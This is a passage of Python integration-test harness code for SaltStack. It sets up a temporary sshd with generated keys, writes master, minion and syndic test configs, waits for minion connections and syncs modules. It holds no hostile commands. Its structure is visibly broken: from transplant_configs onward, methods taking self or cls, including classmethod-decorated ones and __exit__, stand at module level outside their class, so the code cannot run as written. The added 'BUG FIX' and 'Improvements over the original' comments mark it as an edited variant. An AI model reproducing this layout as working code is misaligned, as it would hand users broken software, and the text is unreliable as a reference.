        if keygen_dsa_err:
            print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_dsa_err)))

        keygen_process_ecdsa = subprocess.Popen(
            [keygen, '-t',
             'ecdsa',
             '-b',
             '521',
             '-C',
             '"$(whoami)@$(hostname)-$(date -I)"',
             '-f',
             'ssh_host_ecdsa_key',
             '-P',
             ''],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            close_fds=True,
            cwd=server_key_dir
        )
        _, keygen_escda_err = keygen_process_ecdsa.communicate()
        if keygen_escda_err:
            print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_escda_err)))

        keygen_process_ed25519 = subprocess.Popen(
            [keygen, '-t',
             'ed25519',
             '-b',
             '521',
             '-C',
             '"$(whoami)@$(hostname)-$(date -I)"',
             '-f',
             'ssh_host_ed25519_key',
             '-P',
             ''],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            close_fds=True,
            cwd=server_key_dir
        )
        _, keygen_ed25519_err = keygen_process_ed25519.communicate()
        if keygen_ed25519_err:
            print('ssh-keygen had errors: {0}'.format(salt.utils.to_str(keygen_ed25519_err)))

        # Only advertise host keys that were generated successfully
        with salt.utils.fopen(os.path.join(TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config:
            ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file))
            if not keygen_dsa_err:
                ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file))
            if not keygen_escda_err:
                ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file))
            if not keygen_ed25519_err:
                ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file))

        self.sshd_pidfile = os.path.join(TMP_CONF_DIR, 'sshd.pid')
        self.sshd_process = subprocess.Popen(
            [sshd, '-f', 'sshd_config', '-oPidFile={0}'.format(self.sshd_pidfile)],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            close_fds=True,
            cwd=TMP_CONF_DIR
        )
        _, sshd_err = self.sshd_process.communicate()
        if sshd_err:
            print('sshd had errors on startup: {0}'.format(salt.utils.to_str(sshd_err)))
        else:
            os.environ['SSH_DAEMON_RUNNING'] = 'True'
        # Install the salt-ssh roster with the current user and test key
        roster_path = os.path.join(FILES, 'conf/_ssh/roster')
        shutil.copy(roster_path, TMP_CONF_DIR)
        if salt.utils.is_windows():
            with salt.utils.fopen(os.path.join(TMP_CONF_DIR, 'roster'), 'a') as roster:
                roster.write(' user: {0}\n'.format(win32api.GetUserName()))
                roster.write(' priv: {0}/{1}'.format(TMP_CONF_DIR, 'key_test'))
        else:
            with salt.utils.fopen(os.path.join(TMP_CONF_DIR, 'roster'), 'a') as roster:
                roster.write(' user: {0}\n'.format(pwd.getpwuid(os.getuid()).pw_name))
                roster.write(' priv: {0}/{1}'.format(TMP_CONF_DIR, 'key_test'))
    @classmethod
    def config(cls, role):
        '''
        Return a configuration for a master/minion/syndic.

        Currently these roles are:
            * master
            * minion
            * syndic
            * syndic_master
            * sub_minion

        Raises KeyError if *role* has not been registered in RUNTIME_CONFIGS.
        '''
        return RUNTIME_CONFIGS[role]
    @classmethod
    def config_location(cls):
        '''Return the directory holding the transplanted test configs.'''
        return TMP_CONF_DIR
    @property
    def client(self):
        '''
        Return a local client which will be used for example to ping and sync
        the test minions.

        This client is defined as a class attribute because its creation needs
        to be deferred to a latter stage. If created it on `__enter__` like it
        previously was, it would not receive the master events.
        '''
        if 'runtime_client' not in RUNTIME_CONFIGS:
            # NOTE(review): relies on salt.client being importable via the
            # salt imports at the top of this file - confirm
            RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
                mopts=self.master_opts
            )
        return RUNTIME_CONFIGS['runtime_client']
@classmethod
def transplant_configs(cls, transport='zeromq'):
    '''
    Rebuild the temporary test configuration tree from scratch.

    Reads the checked-in master/minion/syndic configs, overlays the runtime
    values the test suite needs (running user, temp paths, ports, chosen
    *transport*), writes the computed configs into the TMP_*_CONF_DIR
    directories, re-loads them through ``salt.config`` and finally
    creates/verifies every directory the daemons expect.
    '''
    # Start from a clean temporary configuration tree.
    if os.path.isdir(TMP_CONF_DIR):
        shutil.rmtree(TMP_CONF_DIR)
    os.makedirs(TMP_CONF_DIR)
    os.makedirs(TMP_SUB_MINION_CONF_DIR)
    os.makedirs(TMP_SYNDIC_MASTER_CONF_DIR)
    os.makedirs(TMP_SYNDIC_MINION_CONF_DIR)
    print(' * Transplanting configuration files to \'{0}\''.format(TMP_CONF_DIR))
    # The daemons must run as the user executing the test suite.
    if salt.utils.is_windows():
        running_tests_user = win32api.GetUserName()
    else:
        running_tests_user = pwd.getpwuid(os.getuid()).pw_name
    master_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'master'))
    master_opts['user'] = running_tests_user
    tests_known_hosts_file = os.path.join(TMP_CONF_DIR, 'salt_ssh_known_hosts')
    # Use a private, empty known-hosts file so salt-ssh never touches the
    # invoking user's real one.
    with salt.utils.fopen(tests_known_hosts_file, 'w') as known_hosts:
        known_hosts.write('')
    master_opts['known_hosts_file'] = tests_known_hosts_file
    master_opts['conf_dir'] = TMP_CONF_DIR
    minion_config_path = os.path.join(CONF_DIR, 'minion')
    minion_opts = salt.config._read_conf_file(minion_config_path)
    minion_opts['user'] = running_tests_user
    minion_opts['conf_dir'] = TMP_CONF_DIR
    # Master and (first) minion share the same root dir.
    minion_opts['root_dir'] = master_opts['root_dir'] = os.path.join(TMP, 'rootdir')
    sub_minion_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'sub_minion'))
    sub_minion_opts['user'] = running_tests_user
    sub_minion_opts['conf_dir'] = TMP_SUB_MINION_CONF_DIR
    sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
    syndic_master_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'syndic_master'))
    syndic_master_opts['user'] = running_tests_user
    syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
    syndic_master_opts['conf_dir'] = TMP_SYNDIC_MASTER_CONF_DIR
    # The syndic config file has an include setting to include the master configuration
    # Let's start with a copy of the syndic master configuration
    syndic_opts = copy.deepcopy(master_opts)
    # Let's update with the syndic configuration
    syndic_opts.update(salt.config._read_conf_file(os.path.join(CONF_DIR, 'syndic')))
    # Lets remove the include setting
    syndic_opts.pop('include')
    syndic_opts['user'] = running_tests_user
    syndic_opts['conf_dir'] = TMP_SYNDIC_MINION_CONF_DIR
    # Transport overrides; raet uses dedicated ports per daemon.
    if transport == 'raet':
        master_opts['transport'] = 'raet'
        master_opts['raet_port'] = 64506
        minion_opts['transport'] = 'raet'
        minion_opts['raet_port'] = 64510
        sub_minion_opts['transport'] = 'raet'
        sub_minion_opts['raet_port'] = 64520
        # syndic_master_opts['transport'] = 'raet'
    if transport == 'tcp':
        master_opts['transport'] = 'tcp'
        minion_opts['transport'] = 'tcp'
        sub_minion_opts['transport'] = 'tcp'
        syndic_master_opts['transport'] = 'tcp'
    # Set up config options that require internal data
    master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
        'base': [os.path.join(FILES, 'pillar', 'base')]
    }
    master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
        'base': [
            os.path.join(FILES, 'file', 'base'),
            # Let's support runtime created files that can be used like:
            # salt://my-temp-file.txt
            TMP_STATE_TREE
        ],
        # Alternate root to test __env__ choices
        'prod': [
            os.path.join(FILES, 'file', 'prod'),
            TMP_PRODENV_STATE_TREE
        ]
    }
    # External pillar: shell out to dump ext.yaml ('type' on Windows, 'cat'
    # elsewhere).
    for opts_dict in (master_opts, syndic_master_opts):
        if 'ext_pillar' not in opts_dict:
            opts_dict['ext_pillar'] = []
        if salt.utils.is_windows():
            opts_dict['ext_pillar'].append(
                {'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
        else:
            opts_dict['ext_pillar'].append(
                {'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
    for opts_dict in (master_opts, syndic_master_opts):
        # We need to copy the extension modules into the new master root_dir or
        # it will be prefixed by it
        new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
        if not os.path.exists(new_extension_modules_path):
            shutil.copytree(
                os.path.join(
                    INTEGRATION_TEST_DIR, 'files', 'extension_modules'
                ),
                new_extension_modules_path
            )
        opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
    # Point the config values to the correct temporary paths
    for name in ('hosts', 'aliases'):
        optname = '{0}.file'.format(name)
        optname_path = os.path.join(TMP, name)
        master_opts[optname] = optname_path
        minion_opts[optname] = optname_path
        sub_minion_opts[optname] = optname_path
        syndic_opts[optname] = optname_path
        syndic_master_opts[optname] = optname_path
    # Every daemon gets its own free localhost port for connectivity checks.
    master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
    # Wire the runtests engine and log handlers into every daemon config.
    for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts):
        if 'engines' not in conf:
            conf['engines'] = []
        conf['engines'].append({'salt_runtests': {}})
        if 'engines_dirs' not in conf:
            conf['engines_dirs'] = []
        conf['engines_dirs'].insert(0, ENGINES_DIR)
        if 'log_handlers_dirs' not in conf:
            conf['log_handlers_dirs'] = []
        conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
        conf['runtests_log_port'] = SALT_LOG_PORT
    # ----- Transcribe Configuration ---------------------------------------------------------------------------->
    for entry in os.listdir(CONF_DIR):
        if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master'):
            # These have runtime computed values and will be handled
            # differently
            continue
        entry_path = os.path.join(CONF_DIR, entry)
        if os.path.isfile(entry_path):
            shutil.copy(
                entry_path,
                os.path.join(TMP_CONF_DIR, entry)
            )
        elif os.path.isdir(entry_path):
            shutil.copytree(
                entry_path,
                os.path.join(TMP_CONF_DIR, entry)
            )
    # Dump each computed config as YAML; note the locals() lookup, which
    # requires the *_opts local variable names above to stay unchanged.
    for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master'):
        computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
        salt.utils.fopen(os.path.join(TMP_CONF_DIR, entry), 'w').write(
            yaml.dump(computed_config, default_flow_style=False)
        )
    sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
    salt.utils.fopen(os.path.join(TMP_SUB_MINION_CONF_DIR, 'minion'), 'w').write(
        yaml.dump(sub_minion_computed_config, default_flow_style=False)
    )
    shutil.copyfile(os.path.join(TMP_CONF_DIR, 'master'), os.path.join(TMP_SUB_MINION_CONF_DIR, 'master'))
    syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
    salt.utils.fopen(os.path.join(TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w').write(
        yaml.dump(syndic_master_computed_config, default_flow_style=False)
    )
    syndic_computed_config = copy.deepcopy(syndic_opts)
    salt.utils.fopen(os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w').write(
        yaml.dump(syndic_computed_config, default_flow_style=False)
    )
    shutil.copyfile(os.path.join(TMP_CONF_DIR, 'master'), os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'master'))
    # <---- Transcribe Configuration -----------------------------------------------------------------------------
    # ----- Verify Environment ---------------------------------------------------------------------------------->
    # Re-load through the real config loaders so defaults get applied.
    master_opts = salt.config.master_config(os.path.join(TMP_CONF_DIR, 'master'))
    minion_opts = salt.config.minion_config(os.path.join(TMP_CONF_DIR, 'minion'))
    syndic_opts = salt.config.syndic_config(
        os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'master'),
        os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
    )
    sub_minion_opts = salt.config.minion_config(os.path.join(TMP_SUB_MINION_CONF_DIR, 'minion'))
    syndic_master_opts = salt.config.master_config(os.path.join(TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
    RUNTIME_CONFIGS['master'] = freeze(master_opts)
    RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
    RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
    RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
    RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
    # Create every directory the daemons expect, owned by the test user.
    verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
                os.path.join(master_opts['pki_dir'], 'minions_pre'),
                os.path.join(master_opts['pki_dir'], 'minions_rejected'),
                os.path.join(master_opts['pki_dir'], 'minions_denied'),
                os.path.join(master_opts['cachedir'], 'jobs'),
                os.path.join(master_opts['cachedir'], 'raet'),
                os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
                os.path.join(syndic_master_opts['pki_dir'], 'minions'),
                os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
                os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
                os.path.join(syndic_master_opts['cachedir'], 'jobs'),
                os.path.join(syndic_master_opts['cachedir'], 'raet'),
                os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
                os.path.join(master_opts['pki_dir'], 'accepted'),
                os.path.join(master_opts['pki_dir'], 'rejected'),
                os.path.join(master_opts['pki_dir'], 'pending'),
                os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
                os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
                os.path.join(syndic_master_opts['pki_dir'], 'pending'),
                os.path.join(syndic_master_opts['cachedir'], 'raet'),
                os.path.join(minion_opts['pki_dir'], 'accepted'),
                os.path.join(minion_opts['pki_dir'], 'rejected'),
                os.path.join(minion_opts['pki_dir'], 'pending'),
                os.path.join(minion_opts['cachedir'], 'raet'),
                os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
                os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
                os.path.join(sub_minion_opts['pki_dir'], 'pending'),
                os.path.join(sub_minion_opts['cachedir'], 'raet'),
                os.path.dirname(master_opts['log_file']),
                minion_opts['extension_modules'],
                sub_minion_opts['extension_modules'],
                sub_minion_opts['pki_dir'],
                master_opts['sock_dir'],
                syndic_master_opts['sock_dir'],
                sub_minion_opts['sock_dir'],
                minion_opts['sock_dir'],
                TMP_STATE_TREE,
                TMP_PRODENV_STATE_TREE,
                TMP,
                ],
               running_tests_user)
    # Expose the final opts on the class for the rest of the suite.
    cls.master_opts = master_opts
    cls.minion_opts = minion_opts
    cls.sub_minion_opts = sub_minion_opts
    cls.syndic_opts = syndic_opts
    cls.syndic_master_opts = syndic_master_opts
    # <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
    '''
    Kill the minion and master processes.

    Terminates the sub-minion, minion and master, then the syndic and
    syndic-master (which only exist for some test runs), and finally shuts
    down the log server and the multiprocessing logging machinery.

    Improvements over the original: the large slab of commented-out
    ``clean_proc``/``join`` dead code was removed, and the two duplicated
    try/except terminate blocks were folded into one loop.
    '''
    self.sub_minion_process.terminate()
    self.minion_process.terminate()
    self.master_process.terminate()
    # The syndic daemons are only started for some configurations, so the
    # attributes may not exist — same AttributeError guard as before.
    for proc_attr in ('syndic_process', 'smaster_process'):
        try:
            getattr(self, proc_attr).terminate()
        except AttributeError:
            pass
    self.log_server.server_close()
    self.log_server.shutdown()
    self._exit_mockbin()
    self._exit_ssh()
    self.log_server_process.join()
    # Shutdown the multiprocessing logging queue listener
    salt_log_setup.shutdown_multiprocessing_logging()
    salt_log_setup.shutdown_multiprocessing_logging_listener()
def pre_setup_minions(self):
    '''
    Hook for subclasses: runs before the minion setup routines.
    '''
def setup_minions(self):
    '''
    Hook for subclasses: the minion setup routines themselves.
    '''
def post_setup_minions(self):
    '''
    Hook for subclasses: runs after the minions have been set up.
    '''
def _enter_mockbin(self):
    '''Make the mocked binaries directory take precedence on ``PATH``.'''
    entries = os.environ.get('PATH', '').split(os.pathsep)
    if MOCKBIN not in entries:
        entries = [MOCKBIN] + entries
    os.environ['PATH'] = os.pathsep.join(entries)
def _exit_ssh(self):
    '''
    Stop the sshd daemon started for the salt-ssh tests, if one was started.
    '''
    if hasattr(self, 'sshd_process'):
        try:
            self.sshd_process.kill()
        except OSError as exc:
            # errno 3 == ESRCH ("no such process"): already gone, ignore.
            if exc.errno != 3:
                raise
        # Also kill the PID recorded in the pidfile — sshd may have
        # daemonized away from the Popen handle killed above.
        with salt.utils.fopen(self.sshd_pidfile) as fhr:
            try:
                os.kill(int(fhr.read()), signal.SIGKILL)
            except OSError as exc:
                # Same ESRCH tolerance as above.
                if exc.errno != 3:
                    raise
def _exit_mockbin(self):
    '''Remove the mocked binaries directory from ``PATH`` again.'''
    entries = os.environ.get('PATH', '').split(os.pathsep)
    if MOCKBIN in entries:
        entries.remove(MOCKBIN)
    os.environ['PATH'] = os.pathsep.join(entries)
@classmethod
def clean(cls):
    '''
    Remove the temporary directories created by the test run.
    '''
    def _force_remove(func, path, excinfo):
        # Some files are created read-only; make them writable, then retry.
        os.chmod(path, stat.S_IWRITE)
        func(path)

    for tmpdir in (TMP, TMP_STATE_TREE, TMP_PRODENV_STATE_TREE):
        if os.path.isdir(tmpdir):
            shutil.rmtree(tmpdir, onerror=_force_remove)
def wait_for_jid(self, targets, jid, timeout=120):
    '''
    Poll until job *jid* is no longer running on any of *targets*.

    Returns True once the job has been absent from ``saltutil.running``
    for two consecutive polls (debounce against false positives), or
    False if *timeout* seconds elapse first.
    '''
    time.sleep(1)  # Allow some time for minions to accept jobs
    now = datetime.now()
    expire = now + timedelta(seconds=timeout)
    job_finished = False
    while now <= expire:
        running = self.__client_job_running(targets, jid)
        # Clear the current progress line before rewriting it.
        sys.stdout.write(
            '\r{0}\r'.format(
                ' ' * getattr(self.parser.options, 'output_columns', PNUM)
            )
        )
        if not running and job_finished is False:
            # Let's not have false positives and wait one more seconds
            job_finished = True
        elif not running and job_finished is True:
            # Absent on two consecutive polls: really done.
            return True
        elif running and job_finished is True:
            # Job reappeared; reset the debounce.
            job_finished = False
        if job_finished is False:
            sys.stdout.write(
                ' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                    '{0}'.format(expire - now).rsplit('.', 1)[0],
                    ', '.join(running),
                    **self.colors
                )
            )
            sys.stdout.flush()
        time.sleep(1)
        now = datetime.now()
    else:  # pylint: disable=W0120
        # while/else: only reached when the loop times out.
        sys.stdout.write(
            '\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
            'back\n'.format(**self.colors)
        )
        sys.stdout.flush()
    return False
def __client_job_running(self, targets, jid):
    '''Return the minions in *targets* where *jid* still shows as running.'''
    running = self.client.cmd(
        list(targets), 'saltutil.running', expr_form='list'
    )
    active = []
    for minion, jobs in six.iteritems(running):
        if jobs and jobs[0]['jid'] == jid:
            active.append(minion)
    return active
def wait_for_minion_connections(self, targets, timeout):
    '''
    Block until every minion in *targets* answers ``test.ping``, or exit.

    Polls once per second; on *timeout* seconds without all minions
    connecting, prints a warning and raises SystemExit.
    '''
    salt.utils.appendproctitle('WaitForMinionConnections')
    sys.stdout.write(
        ' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to '
        'connect back\n'.format(
            (timeout > 60 and
             timedelta(seconds=timeout) or
             '{0} secs'.format(timeout)),
            ', '.join(targets),
            **self.colors
        )
    )
    sys.stdout.flush()
    expected_connections = set(targets)
    now = datetime.now()
    expire = now + timedelta(seconds=timeout)
    while now <= expire:
        # Clear and redraw the countdown line.
        sys.stdout.write(
            '\r{0}\r'.format(
                ' ' * getattr(self.parser.options, 'output_columns', PNUM)
            )
        )
        sys.stdout.write(
            ' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
                '{0}'.format(expire - now).rsplit('.', 1)[0],
                ', '.join(expected_connections),
                **self.colors
            )
        )
        sys.stdout.flush()
        try:
            responses = self.client.cmd(
                list(expected_connections), 'test.ping', expr_form='list',
            )
        # we'll get this exception if the master process hasn't finished starting yet
        except SaltClientError:
            time.sleep(0.1)
            now = datetime.now()
            continue
        for target in responses:
            if target not in expected_connections:
                # Someone(minion) else "listening"?
                continue
            expected_connections.remove(target)
            sys.stdout.write(
                '\r{0}\r'.format(
                    ' ' * getattr(self.parser.options, 'output_columns',
                                  PNUM)
                )
            )
            sys.stdout.write(
                ' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format(
                    target, **self.colors
                )
            )
            sys.stdout.flush()
        if not expected_connections:
            # Everyone answered: success.
            return
        time.sleep(1)
        now = datetime.now()
    else:  # pylint: disable=W0120
        # while/else: only reached on timeout.
        print(
            '\n {LIGHT_RED}*{ENDC} WARNING: Minions failed to connect '
            'back. Tests requiring them WILL fail'.format(**self.colors)
        )
        try:
            print_header(
                '=', sep='=', inline=True,
                width=getattr(self.parser.options, 'output_columns', PNUM)
            )
        except TypeError:
            # Older print_header signatures do not accept ``width``.
            print_header('=', sep='=', inline=True)
        raise SystemExit()
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
    '''
    Run ``saltutil.sync_<modules_kind>`` on *targets* and wait for returns.

    Returns True when all targets report, False on a sync error; raises
    SystemExit if the sync job itself times out.
    '''
    if not timeout:
        timeout = 120
    # Let's sync all connected minions
    # NOTE(review): positional arg {0} (the joined targets) is never used
    # by this format string, so the target list is omitted from the
    # message — confirm whether that was intended.
    print(
        ' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
        '(saltutil.sync_{1})'.format(
            ', '.join(targets),
            modules_kind,
            **self.colors
        )
    )
    syncing = set(targets)
    jid_info = self.client.run_job(
        list(targets), 'saltutil.sync_{0}'.format(modules_kind),
        expr_form='list',
        timeout=999999999999999,
    )
    if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
        print(
            ' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
            'Tests requiring these {0} WILL fail'.format(
                modules_kind, **self.colors)
        )
        raise SystemExit()
    while syncing:
        rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
        if rdata:
            for name, output in six.iteritems(rdata):
                if not output['ret']:
                    # Already synced!?
                    # NOTE(review): unguarded set.remove here, while the
                    # branch below guards against KeyError — a duplicate
                    # empty return would raise.
                    syncing.remove(name)
                    continue
                if isinstance(output['ret'], six.string_types):
                    # An errors has occurred
                    print(
                        ' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
                        '{1}'.format(
                            name, output['ret'],
                            modules_kind,
                            **self.colors)
                    )
                    return False
                print(
                    ' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
                    '{1}'.format(
                        name,
                        ', '.join(output['ret']),
                        modules_kind, **self.colors
                    )
                )
                # Synced!
                try:
                    syncing.remove(name)
                except KeyError:
                    print(
                        ' {LIGHT_RED}*{ENDC} {0} already synced??? '
                        '{1}'.format(name, output, **self.colors)
                    )
    return True
def sync_minion_states(self, targets, timeout=None):
    '''Sync state modules out to *targets*.'''
    salt.utils.appendproctitle('SyncMinionStates')
    self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
    '''Sync execution modules out to *targets*.'''
    salt.utils.appendproctitle('SyncMinionModules')
    self.sync_minion_modules_('modules', targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
    '''
    Sync grains modules out to *targets*.

    Sets the process title first, for consistency with
    sync_minion_states() and sync_minion_modules() — the original wrapper
    was the only one of the three that skipped this step.
    '''
    salt.utils.appendproctitle('SyncMinionGrains')
    self.sync_minion_modules_('grains', targets, timeout=timeout)
class AdaptedConfigurationTestCaseMixIn(object):
    '''
    Mix-in resolving the transplanted test configuration files and the
    parsed (and cached) salt configurations built from them.
    '''

    __slots__ = ()

    def get_config(self, config_for, from_scratch=False):
        '''
        Return the parsed configuration for *config_for* (master, minion,
        sub_minion, syndic, syndic_master or client_config).

        With ``from_scratch=True`` the config file is re-parsed every call;
        otherwise the frozen result is cached in ``RUNTIME_CONFIGS``.
        '''
        if from_scratch:
            if config_for in ('master', 'syndic_master'):
                return salt.config.master_config(self.get_config_file_path(config_for))
            elif config_for in ('minion', 'sub_minion'):
                return salt.config.minion_config(self.get_config_file_path(config_for))
            elif config_for in ('syndic',):
                # Syndic needs both its master and its minion config file.
                return salt.config.syndic_config(
                    self.get_config_file_path(config_for),
                    self.get_config_file_path('minion')
                )
            elif config_for == 'client_config':
                return salt.config.client_config(self.get_config_file_path('master'))
        if config_for not in RUNTIME_CONFIGS:
            # Same dispatch as above, but the result is frozen and cached.
            if config_for in ('master', 'syndic_master'):
                RUNTIME_CONFIGS[config_for] = freeze(
                    salt.config.master_config(self.get_config_file_path(config_for))
                )
            elif config_for in ('minion', 'sub_minion'):
                RUNTIME_CONFIGS[config_for] = freeze(
                    salt.config.minion_config(self.get_config_file_path(config_for))
                )
            elif config_for in ('syndic',):
                RUNTIME_CONFIGS[config_for] = freeze(
                    salt.config.syndic_config(
                        self.get_config_file_path(config_for),
                        self.get_config_file_path('minion')
                    )
                )
            elif config_for == 'client_config':
                RUNTIME_CONFIGS[config_for] = freeze(
                    salt.config.client_config(self.get_config_file_path('master'))
                )
        return RUNTIME_CONFIGS[config_for]

    def get_config_dir(self):
        '''Return the temporary configuration directory.'''
        return TMP_CONF_DIR

    def get_config_file_path(self, filename):
        '''
        Map a logical config name to its on-disk path; the syndic and
        sub-minion configs live in their own dedicated directories.
        '''
        if filename == 'syndic_master':
            return os.path.join(TMP_SYNDIC_MASTER_CONF_DIR, 'master')
        if filename == 'syndic':
            return os.path.join(TMP_SYNDIC_MINION_CONF_DIR, 'minion')
        if filename == 'sub_minion':
            return os.path.join(TMP_SUB_MINION_CONF_DIR, 'minion')
        return os.path.join(TMP_CONF_DIR, filename)

    @property
    def master_opts(self):
        '''
        Return the options used for the master
        '''
        return self.get_config('master')
class SaltMinionEventAssertsMixIn(object):
    '''
    Asserts to verify that a given event was seen on the minion event bus.

    On instantiation a background process is spawned that copies every
    minion event into a multiprocessing queue for later inspection.
    '''

    def __new__(cls, *args, **kwargs):
        # We have to cross-call to re-gen a config
        cls.q = multiprocessing.Queue()
        cls.fetch_proc = multiprocessing.Process(target=cls._fetch, args=(cls.q,))
        cls.fetch_proc.start()
        return object.__new__(cls)

    @staticmethod
    def _fetch(q):
        '''
        Collect minion events and push them onto *q*.
        '''
        def _clean_queue():
            # Drain whatever is left at interpreter exit.
            print('Cleaning queue!')
            while not q.empty():
                queue_item = q.get()
                queue_item.task_done()

        atexit.register(_clean_queue)
        a_config = AdaptedConfigurationTestCaseMixIn()
        event = salt.utils.event.get_event(
            'minion',
            sock_dir=a_config.get_config('minion')['sock_dir'],
            opts=a_config.get_config('minion')
        )
        while True:
            try:
                events = event.get_event(full=False)
            except Exception:
                # This is broad but we'll see all kinds of issues right now
                # if we drop the proc out from under the socket while we're
                # reading.
                # BUG FIX: the original fell through to q.put(events) here,
                # raising NameError if the very first read failed and
                # re-queueing a stale event otherwise.
                continue
            q.put(events)

    def assertMinionEventFired(self, tag):
        #TODO
        raise salt.exceptions.NotImplemented('assertMinionEventFired() not implemented')

    def assertMinionEventReceived(self, desired_event):
        '''
        Assert *desired_event* appears on the event queue within ~2.5s.
        '''
        queue_wait = 5  # 2.5s
        while self.q.empty():
            time.sleep(0.5)  # Wait for events to be pushed into the queue
            queue_wait -= 1
            if queue_wait <= 0:
                raise AssertionError('Queue wait timer expired')
        while not self.q.empty():  # This is not thread-safe and may be inaccurate
            event = self.q.get()
            if isinstance(event, dict):
                # Drop the timestamp so comparison is content-only.
                event.pop('_stamp')
            if desired_event == event:
                self.fetch_proc.terminate()
                return True
        self.fetch_proc.terminate()
        raise AssertionError('Event {0} was not received by minion'.format(desired_event))
class SaltClientTestCaseMixIn(AdaptedConfigurationTestCaseMixIn):
    '''
    Mix-in exposing a process-wide cached LocalClient built from this
    case's configured master config file.
    '''

    _salt_client_config_file_name_ = 'master'
    __slots__ = ()

    @property
    def client(self):
        cache_key = 'runtime_client'
        if cache_key not in RUNTIME_CONFIGS:
            mopts = self.get_config(
                self._salt_client_config_file_name_, from_scratch=True
            )
            RUNTIME_CONFIGS[cache_key] = salt.client.get_local_client(mopts=mopts)
        return RUNTIME_CONFIGS[cache_key]
class ModuleCase(TestCase, SaltClientTestCaseMixIn):
    '''
    Execute a module function
    '''

    def minion_run(self, _function, *args, **kw):
        '''
        Run a single salt function on the 'minion' target and condition
        the return down to match the behavior of the raw function call
        '''
        return self.run_function(_function, args, **kw)

    def run_function(self, function, arg=(), minion_tgt='minion', timeout=25,
                     **kwargs):
        '''
        Run a single salt function and condition the return down to match the
        behavior of the raw function call
        '''
        # Functions for which a None return is legitimate (not a failure).
        # NOTE(review): name has a typo — 'know' should be 'known'.
        know_to_return_none = (
            'file.chown', 'file.chgrp', 'ssh.recv_known_host'
        )
        orig = self.client.cmd(
            minion_tgt, function, arg, timeout=timeout, kwarg=kwargs
        )
        if minion_tgt not in orig:
            # No reply at all from the targeted minion: skip, don't fail.
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get a reply '
                'from the minion \'{0}\'. Command output: {1}'.format(
                    minion_tgt, orig
                )
            )
        elif orig[minion_tgt] is None and function not in know_to_return_none:
            self.skipTest(
                'WARNING(SHOULD NOT HAPPEN #1935): Failed to get \'{0}\' from '
                'the minion \'{1}\'. Command output: {2}'.format(
                    function, minion_tgt, orig
                )
            )
        # Try to match stalled state functions
        orig[minion_tgt] = self._check_state_return(
            orig[minion_tgt]
        )
        return orig[minion_tgt]

